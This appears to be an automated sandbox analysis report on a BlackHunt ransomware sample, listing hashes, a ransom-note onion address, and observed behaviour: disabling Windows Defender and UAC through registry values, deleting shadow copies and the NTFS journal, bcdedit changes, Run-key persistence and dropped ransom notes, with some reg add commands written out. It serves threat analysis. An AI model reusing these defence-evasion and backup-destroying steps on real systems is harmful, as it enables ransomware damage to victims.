Analysis
-
max time kernel
160s -
max time network
170s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
19/01/2024, 00:38
Static task
static1
Behavioral task
behavioral1
Sample
b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe
Resource
win10v2004-20231215-en
General
-
Target
b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe
-
Size
707KB
-
MD5
82d021bf2ade8e76a5faf98697d490d2
-
SHA1
8445a2acc81952afefde3493d1531c26a3791c77
-
SHA256
b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1
-
SHA512
da51a5c41d97480b346740a2dd4a3e4ccd2ecfb24907ccddbb401a9fe10aff0de117e8c6de89c70d0bb542bf7fbcfd566b1c4b31af1eeb41b42e5f39dc67bb51
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1b87vnh:6uaTmkZJ+naie5OTamgEoKxLWqrh
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 1 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 5244 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 4484 bcdedit.exe 4932 bcdedit.exe -
Renames multiple (591) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 5156 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000\Control Panel\International\Geo\Nation b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe -
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\R: b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened (read-only) \??\H: b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened (read-only) \??\P: b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened (read-only) \??\A: b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened (read-only) \??\G: b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened (read-only) \??\J: b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\U: b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened (read-only) \??\L: b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened (read-only) \??\S: b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened (read-only) \??\Z: b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened (read-only) \??\V: b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened (read-only) \??\W: b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened (read-only) \??\Q: b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened (read-only) \??\E: b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened (read-only) \??\I: b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened (read-only) \??\B: b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened (read-only) \??\N: b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened (read-only) \??\K: b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened (read-only) \??\X: b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\T: b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened (read-only) \??\Y: b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened (read-only) \??\O: b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened (read-only) \??\M: b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 5 ip-api.com -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files\dotnet\#BlackHunt_Private.key b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File created C:\Program Files\Uninstall Information\#BlackHunt_ReadMe.txt b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File created C:\Program Files\VideoLAN\VLC\locale\be\#BlackHunt_Private.key b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File created C:\Program Files\VideoLAN\VLC\locale\ky\LC_MESSAGES\#BlackHunt_Private.key b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\oc\LC_MESSAGES\vlc.mo b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\deploy\messages_zh_TW.properties b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\images\#BlackHunt_ReadMe.hta b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\jfxswt.jar b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File created C:\Program Files\VideoLAN\VLC\locale\bs\#BlackHunt_ReadMe.txt b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File created C:\Program Files\VideoLAN\VLC\locale\sr\#BlackHunt_Private.key b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened for modification C:\Program Files\Java\jdk-1.8\lib\sa-jdi.jar b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File created C:\Program Files\VideoLAN\VLC\locale\cs\#BlackHunt_ReadMe.hta b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File created C:\Program Files\VideoLAN\VLC\locale\ne\LC_MESSAGES\#BlackHunt_Private.key b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File created C:\Program Files\VideoLAN\VLC\locale\pt_PT\LC_MESSAGES\#BlackHunt_ReadMe.hta b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\deploy\splash.gif b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File created C:\Program Files\Java\jre-1.8\lib\security\#BlackHunt_Private.key b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\management\snmp.acl.template b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\logging.properties b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File created C:\Program Files\VideoLAN\VLC\locale\fy\LC_MESSAGES\#BlackHunt_Private.key b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File created C:\Program Files\VideoLAN\VLC\locale\vi\LC_MESSAGES\#BlackHunt_ReadMe.txt b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File created C:\Program Files\VideoLAN\VLC\locale\ar\LC_MESSAGES\#BlackHunt_ReadMe.txt b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File created C:\Program Files\VideoLAN\VLC\locale\uz\#BlackHunt_ReadMe.txt b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\xmlresolver.md b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\deploy.jar b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\javafx.properties b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\security\policy\limited\US_export_policy.jar b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File created C:\Program Files\Java\jdk-1.8\legal\#BlackHunt_Private.key b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\jdk\xmlresolver.md b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\deploy\ffjcext.zip b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File created C:\Program Files\VideoLAN\VLC\locale\mn\#BlackHunt_ReadMe.txt b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File created C:\Program Files\VideoLAN\VLC\locale\ug\#BlackHunt_ReadMe.txt b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\en_GB\LC_MESSAGES\vlc.mo b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\security\trusted.libraries b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File created C:\Program Files\Java\jdk-1.8\#BlackHunt_Private.key b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\ext\#BlackHunt_ReadMe.hta b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File created C:\Program Files\Java\jre-1.8\lib\security\policy\unlimited\#BlackHunt_ReadMe.txt b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File created C:\Program Files\VideoLAN\VLC\locale\is\#BlackHunt_ReadMe.txt b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File created C:\Program Files\VideoLAN\VLC\locale\gl\LC_MESSAGES\#BlackHunt_Private.key b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File created C:\Program Files\Java\jdk-1.8\include\#BlackHunt_Private.key b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\ext\dnsns.jar b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\it\LC_MESSAGES\vlc.mo b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File created C:\Program Files\VideoLAN\VLC\locale\mr\#BlackHunt_Private.key b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened for modification C:\Program Files\Java\jdk-1.8\include\jvmti.h b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\cmm\#BlackHunt_Private.key b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\javafx\directshow.md b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\javafx\libffi.md b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\deploy\messages_de.properties b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\hi\LC_MESSAGES\vlc.mo b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File created C:\Program Files\VideoLAN\VLC\locale\ky\#BlackHunt_ReadMe.txt b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File created C:\Program Files\Java\jdk-1.8\lib\#BlackHunt_ReadMe.hta b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\javafx\public_suffix.md b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File created C:\Program Files\VideoLAN\VLC\locale\bg\LC_MESSAGES\#BlackHunt_ReadMe.hta b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File created C:\Program Files\VideoLAN\VLC\locale\hr\#BlackHunt_ReadMe.hta b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File created C:\Program Files\VideoLAN\VLC\locale\kk\#BlackHunt_ReadMe.txt b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File created C:\Program Files\VideoLAN\VLC\locale\ko\#BlackHunt_ReadMe.txt b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened for modification C:\Program Files\Java\jre-1.8\release b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File created C:\Program Files\VideoLAN\VLC\locale\ff\LC_MESSAGES\#BlackHunt_ReadMe.txt b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened for modification C:\Program Files\7-Zip\Lang\cy.txt b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File created C:\Program Files\Google\#BlackHunt_Private.key b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File created C:\Program Files\Java\jdk-1.8\jre\bin\server\#BlackHunt_Private.key b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened for modification C:\Program Files\Java\jre-1.8\bin\javacpl.cpl b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File created C:\Program Files\Java\jre-1.8\lib\applet\#BlackHunt_ReadMe.txt b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\amd64\jvm.cfg b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe File opened for modification C:\Program Files\7-Zip\Lang\be.txt b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3628 schtasks.exe -
Interacts with shadow copies 2 TTPs 5 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1608 vssadmin.exe 780 vssadmin.exe 3032 vssadmin.exe 4364 vssadmin.exe 4660 vssadmin.exe -
Modifies registry class 10 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2 reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon reg.exe -
Suspicious use of AdjustPrivilegeToken 13 IoCs
description pid Process Token: SeDebugPrivilege 3692 b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe Token: SeRestorePrivilege 3692 b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe Token: SeBackupPrivilege 3692 b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe Token: SeTakeOwnershipPrivilege 3692 b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe Token: SeAuditPrivilege 3692 b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe Token: SeSecurityPrivilege 3692 b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe Token: SeIncBasePriorityPrivilege 3692 b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe Token: SeBackupPrivilege 1600 vssvc.exe Token: SeRestorePrivilege 1600 vssvc.exe Token: SeAuditPrivilege 1600 vssvc.exe Token: SeBackupPrivilege 5596 wbengine.exe Token: SeRestorePrivilege 5596 wbengine.exe Token: SeSecurityPrivilege 5596 wbengine.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3692 wrote to memory of 1476 3692 b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe 92 PID 3692 wrote to memory of 1476 3692 b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe 92 PID 3692 wrote to memory of 3444 3692 b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe 94 PID 3692 wrote to memory of 3444 3692 b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe 94 PID 3692 wrote to memory of 2960 3692 b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe 96 PID 3692 wrote to memory of 2960 3692 b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe 96 PID 3692 wrote to memory of 3248 3692 b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe 98 PID 3692 wrote to memory of 3248 3692 b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe 98 PID 3692 wrote to memory of 2212 3692 b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe 101 PID 3692 wrote to memory of 2212 3692 b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe 101 PID 1476 wrote to memory of 4280 1476 cmd.exe 100 PID 1476 wrote to memory of 4280 1476 cmd.exe 100 PID 3444 wrote to memory of 4440 3444 cmd.exe 103 PID 3444 wrote to memory of 4440 3444 cmd.exe 103 PID 2960 wrote to memory of 2268 2960 cmd.exe 105 PID 2960 wrote to memory of 2268 2960 cmd.exe 105 PID 3248 wrote to memory of 4104 3248 cmd.exe 104 PID 3248 wrote to memory of 4104 3248 cmd.exe 104 PID 2212 wrote to memory of 4184 2212 cmd.exe 106 PID 2212 wrote to memory of 4184 2212 cmd.exe 106 PID 3692 wrote to memory of 4812 3692 b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe 109 PID 3692 wrote to memory of 4812 3692 b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe 109 PID 3692 wrote to memory of 448 3692 b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe 110 PID 3692 wrote to memory of 448 3692 b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe 110 PID 3692 wrote to memory of 1148 3692 b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe 112 PID 3692 wrote to memory of 1148 3692 b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe 112 PID 3692 wrote to memory of 3616 3692 b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe 114 PID 3692 wrote to memory of 3616 3692 b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe 114 PID 4812 wrote to memory of 4716 4812 cmd.exe 116 PID 4812 wrote to memory of 4716 4812 cmd.exe 116 PID 3692 wrote to memory of 1004 3692 b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe 117 PID 3692 wrote to memory of 1004 3692 b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe 117 PID 3692 wrote to memory of 4800 3692 b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe 120 PID 3692 wrote to memory of 4800 3692 b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe 120 PID 448 wrote to memory of 4256 448 cmd.exe 121 PID 448 wrote to memory of 4256 448 cmd.exe 121 PID 1148 wrote to memory of 4200 1148 cmd.exe 122 PID 1148 wrote to memory of 4200 1148 cmd.exe 122 PID 3616 wrote to memory of 3992 3616 cmd.exe 123 PID 3616 wrote to memory of 3992 3616 cmd.exe 123 PID 3692 wrote to memory of 3596 3692 b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe 124 PID 3692 wrote to memory of 3596 3692 b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe 124 PID 1004 wrote to memory of 3356 1004 cmd.exe 126 PID 1004 wrote to memory of 3356 1004 cmd.exe 126 PID 3692 wrote to memory of 1916 3692 b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe 135 PID 3692 wrote to memory of 1916 3692 b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe 135 PID 3692 wrote to memory of 2428 3692 b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe 133 PID 3692 wrote to memory of 2428 3692 b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe 133 PID 3692 wrote to memory of 2716 3692 b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe 132 PID 3692 wrote to memory of 2716 3692 b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe 132 PID 3692 wrote to memory of 4464 3692 b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe 130 PID 3692 wrote to memory of 4464 3692 b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe 130 PID 4800 wrote to memory of 4516 4800 cmd.exe 129 PID 4800 wrote to memory of 4516 4800 cmd.exe 129 PID 3692 wrote to memory of 2348 3692 b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe 136 PID 3692 wrote to memory of 2348 3692 b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe 136 PID 3596 wrote to memory of 1460 3596 Process not Found 139 PID 3596 wrote to memory of 1460 3596 Process not Found 139 PID 3692 wrote to memory of 4348 3692 b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe 138 PID 3692 wrote to memory of 4348 3692 b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe 138 PID 1916 wrote to memory of 4700 1916 cmd.exe 141 PID 1916 wrote to memory of 4700 1916 cmd.exe 141 PID 3692 wrote to memory of 3536 3692 b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe 142 PID 3692 wrote to memory of 3536 3692 b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe 142 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe"C:\Users\Admin\AppData\Local\Temp\b5846af94a82dc7ec89126de336ff727cbde2891b9ca5e68a7e952b1ac94afc1.exe"1⤵
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:3692 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1476 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:4280
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
